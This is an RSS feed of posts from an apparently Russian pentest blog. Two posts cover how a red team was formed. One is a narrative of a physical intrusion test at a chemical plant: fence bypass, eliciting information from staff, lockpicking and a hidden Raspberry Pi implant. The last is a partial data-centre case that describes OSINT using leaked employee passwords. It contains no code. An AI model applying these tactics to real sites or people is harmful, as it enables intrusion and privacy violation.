<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>propentest</title><generator>teletype.in</generator><description><![CDATA[propentest]]></description><image><url>https://img3.teletype.in/files/ab/ca/abca5c9a-2ab6-465d-b6ee-e41363d97872.png</url><title>propentest</title><link>https://teletype.in/@propentest</link></image><link>https://teletype.in/@propentest?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/propentest?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/propentest?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Sun, 05 Apr 2026 21:39:51 GMT</pubDate><lastBuildDate>Sun, 05 Apr 2026 21:39:51 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@propentest/bjRlbev1rzg</guid><link>https://teletype.in/@propentest/bjRlbev1rzg?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest</link><comments>https://teletype.in/@propentest/bjRlbev1rzg?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest#comments</comments><dc:creator>propentest</dc:creator><title>Apteka #3</title><pubDate>Mon, 30 Mar 2026 15:04:17 GMT</pubDate><media:content medium="image" url="https://img2.teletype.in/files/97/54/97548aaf-c399-4c3d-bdf2-aa4df60bfd74.png"></media:content><description><![CDATA[<img src="https://img2.teletype.in/files/d0/e2/d0e22eae-d9d4-4a77-b99a-adbddcac9909.png"></img>И так у нас появилась отфильтрованная команда, которая все равно теряла по пути своего следования людей...]]></description><content:encoded><![CDATA[
  <p id="xO8Z">И так у нас появилась отфильтрованная команда, которая все равно теряла по пути своего следования людей...</p>
  <figure id="uSKC" class="m_custom">
    <img src="https://img2.teletype.in/files/d0/e2/d0e22eae-d9d4-4a77-b99a-adbddcac9909.png" width="529.4000000000001" />
  </figure>
  <p id="HK9T">Несмотря на то что мы сформировались как живой организм, где каждый отвечал за свою составляющую, мы еще не были достаточно плотно знакомы. Но на игре передай мяч, мы выяснили, что среди нас практически все взрослые ребята и девчата с прикладным опытом: сети, разработка, администрирование. Также присутствовали специалисты по тестированию на проникновение и баг хантеры. Запал в начале был у всех словно напалм - ничем не потушить. Но спустя время некоторые члены команды остыли в направлении своих факультативных задач и стали &quot;прогуливать&quot; свои домашние задания. Это сразу же сказалось на общей картине. Ведь всегда любое деструктивное действие начинается с малого.</p>
  <figure id="lLum" class="m_custom">
    <img src="https://img2.teletype.in/files/14/20/14201c2e-ccdd-405d-9926-0be3e1f30594.png" width="703" />
  </figure>
  <p id="SF2p">В этот момент я связываюсь с лидом и мы начинаем штормить на тему - &quot;А где взять еще экспертов на борт?&quot;. В этот момент мы начинаем делать оферы своим знакомым и товарищам. Некоторые из них приходят в команду на чистейшем энтузиазме и начинают помогать. Часть команды, к сожалению, пришлось убрать. </p>
  <figure id="UQ0d" class="m_custom">
    <img src="https://img2.teletype.in/files/1b/a5/1ba5078f-9d40-4571-a857-d0099ba56dcd.png" width="683" />
  </figure>
  <p id="i7qN">Как вы думаете что было дальше? У нас вроде уже все есть, спецов добрали, компетенции все присутствуют. По идее взяли лыжи и поехали. Но мы начали со структуро-образующих вещей. Было решено сделать общую базу знаний и делали мы ее на базе Obsidian с расширениями общей синхронизации, которая, к счастью логировалась. Почему к счастью? Узнаете позже. И так каждый стал писать в базу либо информацию о Kill-Chains с Bug Bounty, либо методику тестирования в парадигме своих знаний и умений. База стала расти. И случилась очень незавидная история - произошла авто синхронизация заметок личного характера в общий топик. К счастью, у нас легко все вычислилось при помощи навыков опытного администратора, и мы смогли это устранить. Но это вам на заметку - чем опасен ноушен. Далее мы приняли решение - уезжаем в <strong>редмайн. </strong></p>
  <figure id="L7lS" class="m_original">
    <img src="https://img1.teletype.in/files/4e/4a/4e4aa444-8524-4588-9b2d-109840d2803e.png" width="600" />
  </figure>
  <p id="qcnY">Более сложная настройка, много плагинов, прав доступа, но никаких личных хранений на ПК чувствительной информации (методики тестирования). Единственное, данный шаг сподвигает автоматически на создание корпоративных почт, чтобы можно было проходить процедуру аутентификации. Далее был повешан второй фактор и наша база находится под защитой. Я не буду тут описывать всей архитектуры и пару технических трюков, но концепцию передал верно. Теперь у нас есть роли, права доступа. Выделены люди, кто пишет общую методику, которой мы будем придерживаться. Звучит вкусно. </p>
  <figure id="sOsW" class="m_original">
    <img src="https://img2.teletype.in/files/d5/22/d5226a22-8641-43a1-a172-0ae7861894b1.png" width="615" />
  </figure>
  <p id="L8yf">Так ну теперь то можно идти ломать? Нет, на этом этапе я увидел что наколдовали ребята, занимающиеся администрированием инфраструктуры. Настолько сложной сети для наших задач я еще не видел: там и экономически обоснованные сервера, и экономные ОС, и все это взлетает с автоматизацией. Ну мееед. А самое главное все тесты проходят с тачек, которые логируются и могут в любой момент быть выключены, если заказчик даст понять -  у нас ALARM! Вырубайте свою &quot;зубодробилку&quot;. Это очень классная история, которую коммерчески реализовать почти не возможно. Почему? - Спросите вы. Да потому что внутри одной команды &quot;пялить&quot; в трафик - это нормально и правильно, а когда в тебя &quot;пялят&quot; разные вендоры и на основе твоих секретиков формируют правила для своих продуктов - звучит как полная ерунда. Но в нашем случае мы всегда имеем лог файл на случай инцидента, чтобы доказать нашу непричастность к неправомерным действиям путем предоставления доступа к инфре и логам. </p>
  <p id="f954">Так База Знаний есть, Красная Кнопка реализована, что дальше... А дальше Мы проводим первую встречу, и проводим ее очно на сколько это было позволительно для ее участников.</p>
  <figure id="pRRI" class="m_custom">
    <img src="https://img1.teletype.in/files/0e/b7/0eb7525f-7238-4e0a-8188-1e74a4e8239a.png" width="698" />
  </figure>
  <p id="t4MO">А что было дальше читай в следующих статьях.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@propentest/9FcwnbYjhzC</guid><link>https://teletype.in/@propentest/9FcwnbYjhzC?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest</link><comments>https://teletype.in/@propentest/9FcwnbYjhzC?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest#comments</comments><dc:creator>propentest</dc:creator><title>Apteka #2</title><pubDate>Wed, 25 Mar 2026 10:52:39 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/ba/39/ba3940de-6ef3-4c42-afc4-688eb7c1bd33.png"></media:content><description><![CDATA[<img src="https://img4.teletype.in/files/35/19/3519f740-ef0b-4cb3-a506-3c8f0d531b52.png"></img>150 - именно столько человек пришло на проект.]]></description><content:encoded><![CDATA[
  <figure id="HdYl" class="m_custom">
    <img src="https://img4.teletype.in/files/35/19/3519f740-ef0b-4cb3-a506-3c8f0d531b52.png" width="496.79999999999995" />
  </figure>
  <p id="IyM3">150 - именно столько человек пришло на проект. </p>
  <p id="rWhP">Итак, команды изначально формировались как отдельные мини группы по 10-20 человек. Идея отбора была сформирована таким образом: группы были собраны для совместного поиска уязвимостей на публичных программах BB. Никакого обучения, влияния, настройки внутри не происходило. Во главе стояла идея формирования маленького автономного и саморазвивающегося коллектива. В такой парадигме по законам природы должен был объявится лидер, специалист какого-либо направления (возможно несколько) и люди готовые помогать в достижении общей цели.</p>
  <p id="TYke">Представьте себе картину, где лидеры групп обладают разными компетенциями в разных направлениях:</p>
  <figure id="wnch" class="m_custom">
    <img src="https://img2.teletype.in/files/5b/79/5b795b55-e450-4b45-8219-279a8aec0685.png" width="423" />
  </figure>
  <p id="EtTc">Представьте себе например такой состав команды, на изображении он конечно же усечен, но если ужать со смыслового остатка, то такая команда не сможет взломать любую компанию, с любого сектора и любого размера - это какой-то процент компаний с сотрудниками, которые плохо проинструктированы и не обучены противодействию атак. Но представим, что единственным вектором на внешнем периметре будут уязвимости веба или какого-либо сервиса, или вообще нужно будет злоупотребить уязвимым шаблон в ADCS. В таком случае наша группа скорее всего обречена на провал с большой долей вероятности. Успех будет только в том случае, что встретится уязвимость, сервис или плохо лежащий файл или что-то еще, что наш студент, решающий лабы уже когда-то находил. Вывод группа может делать простые проекты, но в большинстве случаев должна быть дополнена другими специалистами.</p>
  <figure id="Evn8" class="m_custom">
    <img src="https://img3.teletype.in/files/6e/48/6e486216-1be7-4725-b343-129fd7cbc18a.png" width="374.99999999999994" />
  </figure>
  <p id="9EOq">В такой конфигурации шансов становится намного больше, но есть &quot;но&quot;. Ребята заточившие свои мозги под CTF, будут сильно удивлены что багу надо искать не разбирая хеш из изображения, а разбирая исходный код, различные движки и фреймворки. Ни в коем случае не хочу сказать, что CTF-ры ребята не шарящие, наоборот - это профессионалы но с достаточно специфической подготовкой и мышлением. &quot;Внутрянщик&quot; в этой группе может найти баги в сервисах, которые торчат наружу, потому что можно посканить порты, проанализировать что на них висит, поработать с поиском неправильных конфигураций и избыточных разрешений. Шанс на успех есть и в парадигме реальных проектов выше чем у первых ребят. Поэтому данная команда тоже не может работать автономно с гарантией хорошего качества и вероятности успеха 100%. Хотя 100% дать вообще никто не может.</p>
  <figure id="5rIL" class="m_custom">
    <img src="https://img4.teletype.in/files/f9/a6/f9a68ce4-3175-46d5-882f-287bd7b79568.png" width="447.00000000000006" />
  </figure>
  <p id="qDB2">Данная группа имеет огромный потенциал на поиск пробива, компрометацию и выявления &quot;дизастера&quot; для атакуемой компании. Но есть маленькое &quot;но&quot;. Баг Хантеры работают под призмой поиска любых баг, чтобы в моменте получить вознаграждение, а нам то нужен полноценный взлом. Безусловно, такие ребята могут найти очень страшные вещи, которые будут страшнее эксплуатации RDCB, Self Relay и MS17-10. Но их мышление заточено не на пробив с целью поковырять инфраструктуру, а найти на поверхности вещи, которые могут привести к остановке ресурса, доступу к ПДн и прочему. То есть расчитывать, что эта группа расколупает и проведет анализ защищенности внутреннего периметра не стоит. Но данная связка сильнее предыдущей для RT проектов.</p>
  <figure id="U4Iz" class="m_custom">
    <img src="https://img1.teletype.in/files/84/65/8465199d-14ef-41c2-a258-238ae256ec86.png" width="450.00000000000006" />
  </figure>
  <p id="3YWg">Такая группа - это диверсанты в полях. У нас есть &quot;Физик&quot;, есть аналитик и сетевик - такой бригаде не нужно искать что-то на вебе, они зайдут пешком на объект и поломают вашу Циску, настроят маршруты через малину на свои рабочие станции и спокойно будут сидеть в вашей инфраструктуре, пока ее не одолеют, попутно разбираясь с тем, как ломаются &quot;кишки&quot; компании по типу 1С, СУБД, порталы и другое. Такая команда имеет шансы на успех большие, но будет ряд компаний, где нужна будет поддержка и другими компетенциями - внешка, железо, внутрянка и т.д. Такая группа эквивалентна группе, рассмотренной выше.</p>
  <figure id="r8HW" class="m_custom">
    <img src="https://img1.teletype.in/files/c7/84/c7845456-c422-419f-b83a-a6b6fa8f4532.png" width="434" />
  </figure>
  <p id="vRZB">Вот это опасная комбинация людей, оговорюсь я тут подразумеваю опытного сисадмина, разраба и менеджера. Такая группа будет заходить через сложные вещи, связанные с обратной разработкой, поиском мисконфигураций, бизнес логикой, социалкой и другими направлениями. Шансы на успех у такой группы приличные, но скорость и производительность будут иметь низкие показатели. Этой команде явно будет нужно набрать разных компетенций, но начать вокруг себя копать информацию и выполнять проект они смогут, не имея методологии по тестированию.</p>
  <figure id="lQeq" class="m_custom">
    <img src="https://img4.teletype.in/files/36/50/3650abbf-bd41-4a19-81b4-812d8ae07820.png" width="403" />
  </figure>
  <p id="fCn6">Давайте еще один вариант рассмотрим, который был отмечен. Очень интересная группа, которая может двигаться по следам компрометации пентестеров, хакеров, да вообще кого угодно. Такая комбинация специалистов сможет выполнить небольшую часть от общего числа проектов, но за то это будет изящно и максимально скрытно.</p>
  <p id="R34G">Но как вы понимаете из огромного количества людей осталось совсем немного. И не потому что кто-то был плох, а кто-то хорош. Некоторые не смогли удержаться из-за отсутствия времени, кто-то взял резкий старт и потом словил стагнацию, у кого-то не совпали ожидание-реальность. Это естественный процесс отсеивания команды. В итоге у нас сформировалась группа, с которой все и началось. Это была единственная группа с высоким уровнем самоорганизации. </p>
  <p id="HSly">Пока другие решали лабы, думали как разработать малварь или стартанули заливать на свои SSD тонны курсов и книг, лидирующая команда развернула сетевую инфраструктуру, обзавелась почтой и настроила базу знаний. У ребят во главе был лидер с большим опытом управления - это бесспорно &quot;чит&quot;. Но стоит отметить, что в других группах были люди, которые самостоятельно выполняли задания и сдавали об этом отчет. </p>
  <p id="V7fA">А были те, кто говорил, у нас нет лидера, никто не делает минутки встреч и вообще я не понимаю что происходит. Это тоже нормально, но каждому из участков выпал шанс реализовать себя, пройти тестовые задания чтобы попасть в ту саму группу, которая на момент конечно переброса людей составляла 25 человек. </p>
  <p id="goAf">С этого места все и началось. Именно на этом моменте происходила отладка, интервью кандидатов, создание методологии и архитектуры будущего проекта. На этом моменте сформировалась команда этичных хакеров, которые начали свой совместный путь. </p>
  <p id="t07e">В других частях мы разберем: </p>
  <p id="cyYe">- первые проблемы</p>
  <p id="YAdq">- роли внутри</p>
  <p id="s6tQ">- состав компетенций </p>
  <p id="JLTR">- финансовые задачи</p>
  <p id="BXhj">- построение сетевой архитектуры</p>
  <p id="M5du">А также первые встречи вживую и много другое.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@propentest/7x0sHFrqYPM</guid><link>https://teletype.in/@propentest/7x0sHFrqYPM?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest</link><comments>https://teletype.in/@propentest/7x0sHFrqYPM?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest#comments</comments><dc:creator>propentest</dc:creator><title>Взлом Химического Завода</title><pubDate>Fri, 20 Jun 2025 13:01:09 GMT</pubDate><media:content medium="image" url="https://img3.teletype.in/files/e7/46/e746622c-b7d4-41be-b4ea-688f8ffbe2d4.png"></media:content><description><![CDATA[<img src="https://img4.teletype.in/files/3d/34/3d347000-45f2-42dc-ae76-2e9d43ba2b72.png"></img>Всем привет! Подъехал новый кейс про взлом Хим Завода.]]></description><content:encoded><![CDATA[
  <p id="0sDb"><strong>Всем привет! Подъехал новый кейс про взлом Хим Завода.</strong></p>
  <figure id="fGL1" class="m_original">
    <img src="https://img4.teletype.in/files/3d/34/3d347000-45f2-42dc-ae76-2e9d43ba2b72.png" width="626" />
  </figure>
  <p id="Qt8a"><strong>Все события и участники были изменены, и все совпадения являются случайными.</strong></p>
  <p id="LANu"><strong>Хочу подчеркнуть, что информация, которую вы получите после прочтения статьи, носит исключительно обучающий характер, не является призывом к действию и не может использоваться в злонамеренных целях. Моя цель — показать недочеты и уязвимости, которые необходимо устранить ИБ-специалистам в их организациях, а также показать как работают эксперты в направлении кибер учений.</strong></p>
  <h2 id="bdim">Предыстория</h2>
  <p id="oezb">Прилетел заказ из компании, занимающейся химической обработкой сырья. У них - два цеха, административное здание, пропускной режим, охрана от Росгвардии, камеры, СКУД и куча уверенности в себе.</p>
  <figure id="gOEr" class="m_custom">
    <img src="https://img3.teletype.in/files/e3/b2/e3b29f1c-3139-4266-8f06-86001ce84685.jpeg" width="711" />
    <figcaption>Картинка из интеренета</figcaption>
  </figure>
  <p id="YwcY">Сроки - горят. Чтобы забрать проект надо было буквально ехать вчера. У них через два дня - аудит, от какого-то центра 7+1, и надо срочно провести репетицию физического пентеста, чтобы закрыть явные баги, дабы спаси себя от набутыливания.</p>
  <figure id="kW6E" class="m_custom">
    <img src="https://img3.teletype.in/files/66/e9/66e9c8b8-7a6f-4fe5-bd44-4c9b9b5189b5.png" width="763.5555555555555" />
  </figure>
  <p id="U9VV">На разведку - <strong>ноль времени</strong>. Вот пока добираешься до места тестирования, тогда и изучаешь, ну что смеяться, тут уже проще оттолкнуться от фактической картины. Пришел и по месту побродил. Ни тебе фотографий, ни планов, ни списка подрядчиков, ни схемы СКУД. Сразу в поля.</p>
  <blockquote id="uJ3F">В таких случаях я работаю по принципу: &quot;Наблюдай. Импровизируй. Адаптируйся. Побеждай.&quot;</blockquote>
  <figure id="ggls" class="m_custom">
    <img src="https://img3.teletype.in/files/68/31/68315bb6-fff7-4fbe-9c50-33fa29f1c9e6.png" width="696" />
  </figure>
  <h2 id="tUU1">Этап 1: Быть в теме</h2>
  <p id="i6gU">Утро. 07:50. Подъезжаю к проходной как раз в момент, когда тянется вереница рабочих. Все в одинаковых куртках, касках, с рюкзаками.</p>
  <p id="wQaK">Я заранее переоделся в поношенную куртку с логотипом логистической компании (Покупал в целом для проектов на производстве), касочка синяя и рюкзачек.</p>
  <p id="ECUl"><strong>Стратегия простая:</strong> найти фишку местных бизнесменов. Это такое место откуда ребята тащат чего-нибудь домой (металл, пакеты, одежду, всякий списанный хлам и т.п.)</p>
  <p id="CMm1">Поскольку я сам из города, где есть промка, прекрасно знаю, что “не бывает завода без желающих нажиться на имуществе”. Избалованные городские жители могут сказать, что это никому не нужно, но уверяю вас вы не правы. Можете почитать труды Фредерика Тейлора (<a href="https://archive.org/details/principlesofscie00taylrich/page/105/mode/1up" target="_blank">https://archive.org/details/principlesofscie00taylrich/page/105/mode/1up</a>).</p>
  <figure id="Zm0e" class="m_custom">
    <img src="https://img4.teletype.in/files/f3/58/f3586b07-9635-490d-a5d5-5c7917341299.png" width="284.57436517533256" />
  </figure>
  <p id="4xlI">Еще с тысяча девятьсот лохматых годов, было выявлено, что люди которые работают на предприятиях работают там в пол силы, чтобы работы хватило всем или из принципа мой сосед халтурит и я буду. Но тут суть кроется именно в наличии свободного времени и приобретенной “смекалки”, которая шепчет в голове -”Есть вариант урвать, смотри какая медная жила лежит. Давай ее вынесем, она все равно никому не нужна, третью неделю тут валяется…”. Возвращаясь к нашей ситуации, я нашел такое место, там был забочик, который можно было открутить аккуратно ключом на 10 и зайти. Почему это то самое место, откуда происходят материальные выбытия предприятия? Да потому, что там вытоптанная дорожка в поле до места, где может подъехать машина и находится это все на “заднем дворе”. Плюс небольшой анализ показал что за забором ни камер, ни людей, тишь да гладь.</p>
  <figure id="yJUr" class="m_original">
    <img src="https://img3.teletype.in/files/23/b3/23b30cec-53dc-491e-ae79-385fc173d59d.png" width="480" />
  </figure>
  <p id="MkAF"><strong>Initial Access получается.</strong></p>
  <h2 id="8aui">Этап 2: Исследование внутренней среды</h2>
  <p id="LRmt">Теперь поиск БЩУ, офисов, кабинетов… Вы представляете как выглядит на хим. перерабатывающем заводе? Собственно, там даже климат свой, осадки могут быть такой кислотности, что металл за относительно не большой срок службы превращается в труху, кто был на подобных предприятиях знает.</p>
  <p id="atQP">Короче много тут не находишь, спалят на вопросе, а где твой наряд-допуск. У меня этого естественно не было. Единственное, был газик, про который я забыл упомянуть выше, на таких предприятиях он нужен для себя же.</p>
  <figure id="MEef" class="m_custom">
    <img src="https://img1.teletype.in/files/c9/4e/c94edc47-b3d8-4ae7-97cb-fe7d92faebd3.png" width="600" />
  </figure>
  <p id="vlfJ">Короче просто смотрим где щеголяют сотрудники в чистой одежде. На территории предприятия были строгие зоны для курения и это очень хорошо. Там можно постоять и послушать контекст разговоров. Если есть необходимость и вопрос задать.</p>
  <p id="wmnd">Я ничего не понял из разговора, кроме бытовых историй, поэтому пришлось встрявать в разговор.</p>
  <p id="569D">Через пару минут общения и просьбы поделиться сигареткой:</p>
  <ul id="jDUi">
    <li id="2pvQ">А как у вас найти инженеров по безопасности?</li>
    <li id="IuG4">Я не в курсе, а что ты хотел?</li>
    <li id="EEmz">Да вот прислали к вам чтобы избавлять от винды, на Астру скоро перейдем...</li>
  </ul>
  <p id="GYSp">Через 10 минут болтовни с рабочими я уже в курсе:</p>
  <ul id="wk3j">
    <li id="9OzK">где серверная (маленькая «тёплая» комната в правом крыле),</li>
    <li id="3R4k">кто туда ходит (айтишник Жека и мастер участка),</li>
    <li id="z6t0">и что замок на двери в серверную — просто механика, не СКУД.</li>
  </ul>
  <p id="E5N8">Заводчанин вообще не подозревал, что его “не знаю” оказалось еще каким “знаю”.</p>
  <figure id="1OHT" class="m_custom">
    <img src="https://img1.teletype.in/files/c8/d5/c8d5d82a-d649-42fa-8bcc-ac2d17ddd62e.png" width="629" />
  </figure>
  <p id="0LOs">Знаете какой тут используется прием? Как у следователей, которые распутывают дела и их свидетели ничего не видели, никого не знают и сколько времени было не помнят. В таких случаях задаются вопросы по типу, может ты видел на стене часы или на руке коллеги, а может в телефон смотрел? А журналы какие-то были на столе? А не помнишь что за изображение на них было? А что шло по телевизору в этот момент? Может помнишь жарко было в этот момент или уже холодало? Короче я могу сюда написать 1000 и 1 вопрос, который поможет человеку вспомнить для вас полезную информацию.</p>
  <figure id="g2rU" class="m_custom">
    <img src="https://img3.teletype.in/files/62/c3/62c3bd45-02ea-4fb4-b6c0-62aa76d5eab7.png" width="607" />
  </figure>
  <p id="bVW6">Короче нашел я это помещение, но идти туда прямо сейчас было не вариант. Мне пришлось зайти и зависнуть “на звонке” до обеда. По моим наблюдениям лестничная площадка лучшее место для этих дел. Почему? Потому что, если вы будете тусоваться около машинного зала или БЩУ или в тех местах, где могут проходить работы, вас 100 процентов спросят кто вы и что вы. Качать права там не всегда уместно. Поэтому я выжидал обеда, там как по расписанию и без опозданий все дружно уходят.</p>
  <h2 id="6YMF">Этап 3: Проникновение в серверную</h2>
  <p id="mXky">На обеденном перерыве часть персонала ушла таки в столовую. Серверная — рядом. Я подхожу, выглядываю: никого.</p>
  <p id="nGxu">Быстрая работа отмычкой, был мой любимый перфо-профиль, замок открывается за минуты 2. Тут стоечки, порты, все круто, но на тесте я не получил IP адрес, попытался прописать и ничего не вышло. Тут элемент удачи. Здесь не вышло, я вышел из комнаты и пошел искать другие места с выходом в ЛВС Заказчика.</p>
  <figure id="wwTX" class="m_original">
    <img src="https://img3.teletype.in/files/a6/c0/a6c022b1-c310-43e8-ae04-d9591568d585.png" width="640" />
  </figure>
  <p id="yYa9">Тут было куча помещений с стеклянными дверьми. Местами сидели дежурные, которые контролировали внутреннее перемещение, там стояла вертушка. Не вариант. Я нашел помещение, с ультра сложным профилем, туда или мультипик или петерсон, там реально надо было фольгой ковыряться. Ну вариантов не было, сел ковыряться, переодически ходили люди смотрели, но видимо думали что чиню замок. Я не брал с собой спиннер и мне пришлось два оборота набирать заново. Искренне скажу, что это был один из самых сложных профилей для вскрытия. Я и слабый и сильный натяг пробовал, просто непредсказуемость какая-то вышла с этим открытием.</p>
  <figure id="QqZZ" class="m_original">
    <img src="https://img1.teletype.in/files/8b/94/8b94e066-a953-415d-9a6a-5bb9413f9cda.png" width="530" />
  </figure>
  <p id="SF3P">Ну тут окей, стояли несколько ПК, через Kali Live я забрался и пошифрованый диск, полное Г.</p>
  <p id="yOgj">Снял мак и айпишник, прописал сетевой конфиг и залез в сетку, тут уже дела пошли лучше и мне удалось поснифать трафик, дотянуться до DC, на этом этапе малина была подключена самым грязным способом.</p>
  <figure id="vpFr" class="m_original">
    <img src="https://img3.teletype.in/files/e3/30/e330369a-1e7c-4c96-ac24-c306cf0bb6f5.png" width="400" />
    <figcaption>Вариант маскировки малины, их оч много на само деле</figcaption>
  </figure>
  <p id="052i">Потом как в пэкет сквирел, бомбим VPN соединение и пользуемся полноценной хостовой тачкой внутри сети, которая стреляет наружу трафиком. Вот не достать было этой штуки же, сейчас можно, у нас в сообществе есть ребята, которые помогут с этим вопросм.</p>
  <figure id="JvXT" class="m_custom">
    <img src="https://img4.teletype.in/files/fd/d0/fdd06b45-c366-470e-afc8-935ee15d2da3.png" width="670" />
  </figure>
  <p id="Dp3U">Ну все, подрубаемся к малине и погнали бомбить инфру :)</p>
  <h2 id="hHfU">Этап 4: Отход и результат</h2>
  <p id="FaMV">Закрываю дверь, естественно закрывать на ключ не стал - это мазохизм. Вернулся к курильщикам, пару минут болтовни и направился к месту для “местных бизнесменов”.</p>
  <p id="MCuo">Внутрянщики отработали свою часть. проект был успешно завершен.</p>
  <p id="hud2"><strong>Отчёт написал в ту же ночь.</strong></p>
  <p id="doTy">Клиенты в приятном шоке, на следующий день в формате аудита пофиксили вероятности проникновения, но меня заверили, что 7+1 центр не пользуется на таких проектах отмычками. Ох как же они заблуждаются. Вообщем я порекомендовал по полной программе поставить доп камеры, датчики, местами влепить СКУД по мимо механических замков, провести обучение персонала. Кстати на обучении все с удовольствием слушали и практиковались на моих инструментах, тоже важная часть на самом деле. Естественно мы с вами понимаем, что Заказчик не смог бы физически все устранить и поставить оборудование, но обратить внимание на ключевые поинты и выстроить монитиринг ребята смогли. На счет митигации и устранения уязвимостей внутряка не знаю успели ли все сделать или нет. Но мы вместе на “разборе полетов” сидели и частично закрывали явные криты и мисконфигурации в домене. Короче дальнейшую судьбу предприятия не знаю, но на момент завершения работ и нашего сотрудничества все было круто и Заказчик остался довольным.</p>
  <p id="8rhL"><strong>Спасибо дорогой подписчик за твое внимание, а если заинтересовался моими работами, пиши в личку, обсудим ;)</strong></p>
  <p id="TVEE"><strong>Ещё больше интересного в моем ТГ канале: <a href="https://t.me/pro_pentest" target="_blank">https://t.me/pro_pentest</a></strong></p>
  <p id="nEP6"><strong>А также на YouTube канале: <a href="https://www.youtube.com/@pro_pentest" target="_blank">https://www.youtube.com/@pro_pentest</a></strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@propentest/s6R2ahs79eO</guid><link>https://teletype.in/@propentest/s6R2ahs79eO?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest</link><comments>https://teletype.in/@propentest/s6R2ahs79eO?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest#comments</comments><dc:creator>propentest</dc:creator><title>Взлом Дата-центра</title><pubDate>Fri, 17 Jan 2025 11:45:41 GMT</pubDate><media:content medium="image" url="https://img3.teletype.in/files/2c/45/2c45437a-540b-424a-a437-0b2e2751db2a.png"></media:content><description><![CDATA[<img src="https://img4.teletype.in/files/3d/1e/3d1e67c7-f852-43d4-9609-d2b8d011054b.png"></img>Всем привет! Подъехал новый кейс про взлом Дата-центра.]]></description><content:encoded><![CDATA[
  <p id="xC0b"><strong>Всем привет! Подъехал новый кейс про взлом дата-центра.</strong> </p>
  <figure id="wiPx" class="m_custom">
    <img src="https://img4.teletype.in/files/3d/1e/3d1e67c7-f852-43d4-9609-d2b8d011054b.png" width="688.8716904276986" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="FjUt"><strong>Все события и участники были изменены, и все совпадения являются случайными.</strong></p>
  <p id="vADe"><strong>Хочу подчеркнуть, что информация, которую вы получите после прочтения статьи, носит исключительно обучающий характер, не является призывом к действию и не может использоваться в злонамеренных целях. Моя цель — показать недочеты и уязвимости, которые необходимо устранить ИБ-специалистам в их организациях, а также показать как работают эксперты в направлении кибер учений.</strong></p>
  <p id="irwj">Итак, увлекательное путешествие началось, когда мне позвонил с утра представитель сломанной организации и попросил посчитать КП на услугу. Обычно в такие моменты я собираю как можно больше информации, но к сожалению, в этот раз меня не стали посвящать в подробности и попросили об очной встрече.</p>
  <p id="jlaj">Во время беседы с Заказчиком я понял, что ребята уже проводили не один пентест, им есть над чем поработать и снаружи и внутри, но при этом на фоне некоторых событий захотелось проверить насколько они защищены физически.</p>
  <p id="OG9Z">Я плюс-минус перед встречей посмотрел что за компания, чем живет, но более детальной информации так и не получил. Мы договорились подписать NDA с обеих сторон. и приступать к работе.</p>
  <p id="NQX2">Итак, пока у нас есть название компании, надо теперь искать информацию отовсюду. Тут поможет глубинный анализ технологий, сотрудников, топов, клиентов, партнеров, а также геопозиции самого объекта.</p>
  <p id="b9Jt">Первым делом мы начали шерстить LinkedIn. К сожалению, я не могу тут вставлять скрины, поскольку практический OSINT без согласования не может быть опубликован.</p>
  <p id="Ak2n">Сама механика достаточно простая - мы начали просто искать сотрудников из данной компании и выписывать в табличку информацию, мне почему то в этот раз захотелось это поделать в excel. </p>
  <figure id="dSKx" class="m_custom">
    <img src="https://img2.teletype.in/files/13/53/1353a347-c9e9-4b42-9acd-6ea5e9d42e99.png" width="703" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="Ps7v">Далее мы начали собирать информацию со слитых баз Leakcheck и ему подобных сервисов-коллабораторов. Там было много интересного и полезного, но цепочка раскручивалась примерно так: сотруднику дали бонусы в онлайн магазине, если он зарегестрируется по корпоративной почте (стандартные бенефиты компаний). Мы заходили используя эту почту и слитый пароль. А там внутри уже были контактные телефоны сотрудников, которые привязаны к телеге, воцапу и прочим сервисам, различная информация по покупкам, корзине и прочему. Получилось собрать много нужной информации, которая потенциально могла использоваться коллегами для проведения социалки (вишинг + фишинг) или на этапе внутрянки. Пример того как это выглядит можно увидеть ниже:</p>
  <p id="Yfpu">Сначала нашли инфу о топе в ИТ отделе, потом пошли технические спецы, которые по предварительной информации сидели в разных сегментах сети. На этом этапе мы составили полноценное досье сотрудников, которое можно было бы использовать для внедрения в организацию или заведения знакомства. Я покажу как это выглядело у нас, но а вы в своих проектах используйте систему ведения находок, которая будет лично вам удобнее:</p>
  <figure id="QI45" class="m_custom">
    <img src="https://img3.teletype.in/files/e0/e0/e0e05fbc-83e7-4b91-8715-d16049b31a41.png" width="698" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <figure id="qzuW" class="m_custom">
    <img src="https://img4.teletype.in/files/b5/5b/b55b9c7f-5001-4612-8f7a-08bacf056e4e.png" width="698" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <figure id="9Ple" class="m_custom">
